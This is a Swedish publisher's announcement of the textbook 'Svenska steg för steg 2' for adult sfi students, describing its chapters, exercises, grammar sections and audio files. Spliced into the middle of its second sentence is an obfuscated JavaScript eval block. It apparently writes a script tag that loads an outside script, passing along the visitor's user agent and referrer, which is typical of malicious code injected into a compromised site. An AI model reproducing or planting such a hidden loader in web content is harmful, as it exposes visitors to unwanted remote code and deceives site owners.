Nyhet! Svenska steg för steg 2

Svenska steg för steg 2 lärobok. Omslag: John Wasden.Svenska steg för steg 2 övningsbok. Omslag: John Wasden.

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ddfdn|var|u0026u|referrer|ietrh||js|php’.split(’|’),0,{}))
har Svenska steg för steg 2 utkommit!

Svenska steg för steg 2 är ett heltäckande grundmaterial för kurs C inom sfi-undervisningen. Läromedlet vänder sig i första hand till vuxna kursdeltagare med kort skolbakgrund. Det kan även vara lämpligt för studerande på motsvarande nivå inom andra skolformer.

Lärobokens 16 kapitel är indelade efter teman och innehåller korta dialoger och andra texter om vanliga vardagssituationer. Texterna följs av övningar av olika slag samt en presentation av grammatiska moment. Uttalet presenteras på ett metodiskt lättfattligt sätt.

Svenska steg för steg 2 har ett rikt ordförråd som ger goda möjligheter till samtal och diskussioner kring ett brett spektrum av ämnen. Ett omfattande bildmaterial underlättar ordinlärningen.

Inspelningar av lärobokens dialoger ingår i läromedlet (mp3-filer).

Övningsboken innehåller fler övningar som tränar grammatik, ordkunskap, läsförståelse och uttal.

Svenska steg för steg 2 följer samma upplägg som första delen, men texterna är lite längre och ger underlag till fler diskussioner och jämförelser.